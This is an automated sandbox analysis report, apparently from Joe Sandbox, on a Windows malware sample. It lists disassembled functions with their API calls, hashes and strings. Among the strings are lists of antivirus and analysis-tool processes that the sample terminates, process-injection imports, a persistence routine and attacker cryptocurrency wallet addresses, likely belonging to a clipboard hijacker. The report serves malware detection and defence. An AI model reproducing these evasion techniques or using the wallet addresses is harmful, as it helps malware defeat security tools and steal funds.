                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$Open$CloseHandle
                                                                                        • String ID: Mozilla/5.0
                                                                                        • API String ID: 3289985339-2630049532
                                                                                        • Opcode ID: d808c079d8e75f8a4ac68c4773e767ace300b3f5636902ee28373f7788d6eb60
                                                                                        • Instruction ID: 758c68f3cb8765f84133a8e67a447f829480c8f768285947b839801893f3628c
                                                                                        • Opcode Fuzzy Hash: d808c079d8e75f8a4ac68c4773e767ace300b3f5636902ee28373f7788d6eb60
                                                                                        • Instruction Fuzzy Hash: 9C512D7162CA9286E7109F11F46432EB760FBE5B95F204135FA8E82AA8CF7DD844DB40
                                                                                        Function 00007FF60E611478 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 81libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: NtCreateProcessEx$NtCreateThreadEx$NtQueryInformationFile$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$RtlCreateProcessParametersEx$ntdll.dll
                                                                                        • API String ID: 2574300362-3070941563
                                                                                        • Opcode ID: fe0edb3ea2ea9d1b61de22b004e242eb16fd45174bdc196908c66df22b0c4eac
                                                                                        • Instruction ID: c4256c324d1abd6e3265e1807bdafd4d42193c07fefeccf22a5e3510f49a8a1a
                                                                                        • Opcode Fuzzy Hash: fe0edb3ea2ea9d1b61de22b004e242eb16fd45174bdc196908c66df22b0c4eac
                                                                                        • Instruction Fuzzy Hash: 7841E17592DB66C1EA318B04F55436A73A0FB69784F641236F68E83765DF3CE144EB00
                                                                                        Function 00007FF60E63092C Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileHeap$AllocCloseCreateHandleProcessSize
                                                                                        • String ID:
                                                                                        • API String ID: 4026551389-0
                                                                                        • Opcode ID: dad4417b183fee83f8e059b4764bb9658e6ee4e87390e1ce80ae04f4a6b01d07
                                                                                        • Instruction ID: afc7a5da01a1bdc7d1ec2f40d2c8586213d4a9d4964436b030c81a67115829d6
                                                                                        • Opcode Fuzzy Hash: dad4417b183fee83f8e059b4764bb9658e6ee4e87390e1ce80ae04f4a6b01d07
                                                                                        • Instruction Fuzzy Hash: 36810532619B9182EA50CB65F49432EA7A0FBD9B94F604135FA8E83B68DF7DD444DB00
                                                                                        Function 00007FF60E62CEB8 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 103COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID: 360sd.exe$360ts.exe$AvastAntivirus.exe$AvastSvc.exe$AvastUI.exe$MsMpEng.exe$avgnext.exe$avgui.exe$avgwdsvc.exe
                                                                                        • API String ID: 2962429428-2792874574
                                                                                        • Opcode ID: 4ea5b1be55232d26d753203b733671219c7c2ad8b1cc2637dc4e508cc27a149c
                                                                                        • Instruction ID: 72317acfc74ebcd44608bfa18a88661fbe48fe0e4d1d871736d5ec3c040e8fb2
                                                                                        • Opcode Fuzzy Hash: 4ea5b1be55232d26d753203b733671219c7c2ad8b1cc2637dc4e508cc27a149c
                                                                                        • Instruction Fuzzy Hash: 98517051A2CA6380FB209B25F45037EA790EFB0358F600236F5ADC65EADF6CDA45E750
                                                                                        Function 00007FF60E61DF2C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Yarn$Exceptionstd::_$FileHeaderLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrow_lockstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                        • String ID: bad locale name
                                                                                        • API String ID: 3938507140-1405518554
                                                                                        • Opcode ID: ad999236b8d4008b2380ea14d0df8985624ecf54030ce66e7ee12e07fe8f9879
                                                                                        • Instruction ID: 3efbe30afaea97da7674208707a0562bbe51b6f0e00df824a57cc596a397b066
                                                                                        • Opcode Fuzzy Hash: ad999236b8d4008b2380ea14d0df8985624ecf54030ce66e7ee12e07fe8f9879
                                                                                        • Instruction Fuzzy Hash: 4E114F51F28B9641EE00E799F45116DA760FFD1B94F900032F98D4B76BEEACD0059704
                                                                                        Function 00007FF60E62B728 Relevance: 18.2, APIs: 12, Instructions: 244COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: char_traits$Mtx_guardMtx_guard::~_
                                                                                        • String ID:
                                                                                        • API String ID: 3950283302-0
                                                                                        • Opcode ID: 26e523eaab64f351134ad44a1117f834685a3f9a05b7fda99f5919bc6b6d8d46
                                                                                        • Instruction ID: 59870f515431ed780ddd5caa1ffb97f84bd03a7f21ccbe6447e3bd8d3b7c7c24
                                                                                        • Opcode Fuzzy Hash: 26e523eaab64f351134ad44a1117f834685a3f9a05b7fda99f5919bc6b6d8d46
                                                                                        • Instruction Fuzzy Hash: 96D1E866A1DFC181DA70DB95F4953AEB361FBD8B84F104136EA8D83B6ADF2CD0408B41
                                                                                        Function 00007FF60E62DC08 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 62stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Templstrcpy$ExecuteFileNamePathShell
                                                                                        • String ID: .exe$@$open$p$tmp
                                                                                        • API String ID: 3481378980-1541851258
                                                                                        • Opcode ID: 5c69159e7257d6518b28d152e0a484615bf9003ab4f5bea52d68b51e3ab49161
                                                                                        • Instruction ID: 9f11af24caee0d27440e1d456679d0fe2f7f700789731a9fd1b1710ff944c6f8
                                                                                        • Opcode Fuzzy Hash: 5c69159e7257d6518b28d152e0a484615bf9003ab4f5bea52d68b51e3ab49161
                                                                                        • Instruction Fuzzy Hash: 3A312172618B8595E760CB14F4943AAB7A4FB94794F900235F6CD83AA8DF7CD548CB00
                                                                                        Function 00007FF60E62DD68 Relevance: 16.6, APIs: 11, Instructions: 118stringfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Filestrtok$lstrcmplstrlen$AttributesCopyDelete_getptdlstrcpy
                                                                                        • String ID:
                                                                                        • API String ID: 3928754753-0
                                                                                        • Opcode ID: 69ab1e02483d50d6a6ebcaefcdd74d7f8472b56b7eb2f8c7d3e698012a23ad34
                                                                                        • Instruction ID: 927cd8a587155462d1c0f3fc0dc0087f69161a77964b847b83919347d6c1ae72
                                                                                        • Opcode Fuzzy Hash: 69ab1e02483d50d6a6ebcaefcdd74d7f8472b56b7eb2f8c7d3e698012a23ad34
                                                                                        • Instruction Fuzzy Hash: 76512C6262CE9181EB64DB14F45837E63A0FBA8B48F604136F68DC3AA9DF3CD944D704
                                                                                        Function 00007FF60E63001C Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF60E6310A0: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E630057), ref: 00007FF60E6310E8
                                                                                          • Part of subcall function 00007FF60E6310A0: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E630057), ref: 00007FF60E631125
                                                                                          • Part of subcall function 00007FF60E6310A0: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E630057), ref: 00007FF60E631130
                                                                                          • Part of subcall function 00007FF60E6302E0: RegOpenKeyExW.ADVAPI32 ref: 00007FF60E630323
                                                                                          • Part of subcall function 00007FF60E6302E0: RegSetValueExW.ADVAPI32 ref: 00007FF60E630359
                                                                                          • Part of subcall function 00007FF60E6302E0: RegCloseKey.ADVAPI32 ref: 00007FF60E630368
                                                                                          • Part of subcall function 00007FF60E630C08: RegDeleteKeyW.ADVAPI32 ref: 00007FF60E630C20
                                                                                          • Part of subcall function 00007FF60E630E78: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF60E630E8B
                                                                                          • Part of subcall function 00007FF60E630E78: Process32FirstW.KERNEL32 ref: 00007FF60E630EB5
                                                                                          • Part of subcall function 00007FF60E630E78: CloseHandle.KERNEL32 ref: 00007FF60E630EC4
                                                                                          • Part of subcall function 00007FF60E630E78: wcscmp.MSVCRT ref: 00007FF60E630ED9
                                                                                          • Part of subcall function 00007FF60E630E78: OpenProcess.KERNEL32 ref: 00007FF60E630EEF
                                                                                          • Part of subcall function 00007FF60E630E78: TerminateProcess.KERNEL32 ref: 00007FF60E630F09
                                                                                          • Part of subcall function 00007FF60E630E78: CloseHandle.KERNEL32 ref: 00007FF60E630F14
                                                                                          • Part of subcall function 00007FF60E630E78: Process32NextW.KERNEL32 ref: 00007FF60E630F24
                                                                                          • Part of subcall function 00007FF60E630E78: CloseHandle.KERNEL32 ref: 00007FF60E630F33
                                                                                          • Part of subcall function 00007FF60E630F48: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00007FF60E630830), ref: 00007FF60E630F77
                                                                                        • Sleep.KERNEL32 ref: 00007FF60E630106
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                        • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                        • API String ID: 2853470409-928700279
                                                                                        • Opcode ID: fe3a8ccc8966489c9bf42d5c7acf8396356c702022448553b11e78d999c2d4d6
                                                                                        • Instruction ID: 3e4764c878dd0612bb22c5c07db3e92d0000653ee0e9f0467094161c1ba8815e
                                                                                        • Opcode Fuzzy Hash: fe3a8ccc8966489c9bf42d5c7acf8396356c702022448553b11e78d999c2d4d6
                                                                                        • Instruction Fuzzy Hash: 37217461EB842795FA80AB74F9611B92760AFB4750FA04536F41EC21E7DE2CE54AE340
                                                                                        Function 00007FF60E630C44 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 42stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF60E630D0C: GetWindowsDirectoryA.KERNEL32 ref: 00007FF60E630D41
                                                                                          • Part of subcall function 00007FF60E630D0C: GetVolumeInformationA.KERNEL32 ref: 00007FF60E630DCF
                                                                                          • Part of subcall function 00007FF60E630D0C: wsprintfA.USER32 ref: 00007FF60E630E5E
                                                                                        • SHGetFolderPathA.SHELL32(?,?,?,?,?,?,?,?,?,00007FF60E62DE7D), ref: 00007FF60E630C85
                                                                                        • lstrcat.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF60E62DE7D), ref: 00007FF60E630C97
                                                                                        • lstrcat.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF60E62DE7D), ref: 00007FF60E630CA7
                                                                                        • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF60E62DE7D), ref: 00007FF60E630CB4
                                                                                        • SetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF60E62DE7D), ref: 00007FF60E630CC4
                                                                                        • lstrcat.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF60E62DE7D), ref: 00007FF60E630CD6
                                                                                        • lstrcat.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF60E62DE7D), ref: 00007FF60E630CE6
                                                                                        • lstrcat.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF60E62DE7D), ref: 00007FF60E630CF8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                        • String ID: .exe
                                                                                        • API String ID: 1846285901-4119554291
                                                                                        • Opcode ID: 1e0782898900f0c9169d678093e814d4bf1776dfe6d0791ba9bb1146b86bc58f
                                                                                        • Instruction ID: 7a6914f09b30fcf1b615adbee0f3d49c5ca58e8fdd21720ede63677c5bf5616d
                                                                                        • Opcode Fuzzy Hash: 1e0782898900f0c9169d678093e814d4bf1776dfe6d0791ba9bb1146b86bc58f
                                                                                        • Instruction Fuzzy Hash: AD115122B38953A7DB409B25F85457E6362FBD4B44FA09032FA4E83A39DE3CD049DB00
                                                                                        Function 00007FF60E62FE30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                        • String ID: rbNSpGEsyb
                                                                                        • API String ID: 299056699-189039185
                                                                                        • Opcode ID: 46ba0cd2de08216aef1d8b73fc81ba437baef2bc7f4b68b9de387672fb1d2dc8
                                                                                        • Instruction ID: 7dec42ade9d6734bb90d014117e4f4e6830132f0c5b7fe56848cb3bc769a32a4
                                                                                        • Opcode Fuzzy Hash: 46ba0cd2de08216aef1d8b73fc81ba437baef2bc7f4b68b9de387672fb1d2dc8
                                                                                        • Instruction Fuzzy Hash: 41019B26A2CA6282E7209B11F85422D6370FBF8B55FA01536F98EC2765CF3CD944D640
                                                                                        Function 00007FF60E615B38 Relevance: 15.5, APIs: 1, Strings: 9, Instructions: 475sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF60E61D8F4: shared_ptr.LIBCPMTD ref: 00007FF60E61D926
                                                                                          • Part of subcall function 00007FF60E61D7D0: UnDecorator::getVbTableType.LIBCMTD ref: 00007FF60E61D7FF
                                                                                          • Part of subcall function 00007FF60E615A5C: Concurrency::details::VirtualProcessorRoot::GetSchedulerProxy.LIBCMTD ref: 00007FF60E615A9D
                                                                                          • Part of subcall function 00007FF60E613920: shared_ptr.LIBCPMTD ref: 00007FF60E613940
                                                                                          • Part of subcall function 00007FF60E6159B8: GlobalAlloc.KERNEL32 ref: 00007FF60E6159DF
                                                                                          • Part of subcall function 00007FF60E6159B8: GlobalLock.KERNEL32 ref: 00007FF60E6159FE
                                                                                          • Part of subcall function 00007FF60E6159B8: GlobalUnlock.KERNEL32 ref: 00007FF60E615A1B
                                                                                        • Sleep.KERNEL32 ref: 00007FF60E6166A9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$shared_ptr$AllocConcurrency::details::Decorator::getLockProcessorProxyRoot::SchedulerSleepTableTypeUnlockVirtual
                                                                                        • String ID: 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe$13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx$TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                        • API String ID: 2382078925-3773165574
                                                                                        • Opcode ID: 21d35d6f7c0a6df29142ddf1a1bf3c38aef0ed986b01762a66452d2035f17931
                                                                                        • Instruction ID: 94a71912d9b797da3d36357ceed7a6179b9c851ba7f3fc8e4d87610902f6d8cf
                                                                                        • Opcode Fuzzy Hash: 21d35d6f7c0a6df29142ddf1a1bf3c38aef0ed986b01762a66452d2035f17931
                                                                                        • Instruction Fuzzy Hash: 8642F136619BD190DA72DB45F4902EAB3A4FBD8790F904132EACD87B5AEF2CD144DB40
                                                                                        Function 00007FF60E630E78 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 1083639309-0
                                                                                        • Opcode ID: 33d517ba9ed34bad332c22683f5269e417fb0aac9e56d6b41238f0337e4f5fc0
                                                                                        • Instruction ID: c93cea4c1027e6e14862dce0897b38500015e0a33543de08e30e7e914034584d
                                                                                        • Opcode Fuzzy Hash: 33d517ba9ed34bad332c22683f5269e417fb0aac9e56d6b41238f0337e4f5fc0
                                                                                        • Instruction Fuzzy Hash: D9215422B2C96282E7A09F21F85433E6360FBE4B94F605235F59EC25A4DF3CD949D700
                                                                                        Function 00007FF60E63796B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception_getptd$DestructObject$Raise_getptd_noexit
                                                                                        • String ID: csm
                                                                                        • API String ID: 2851507484-1018135373
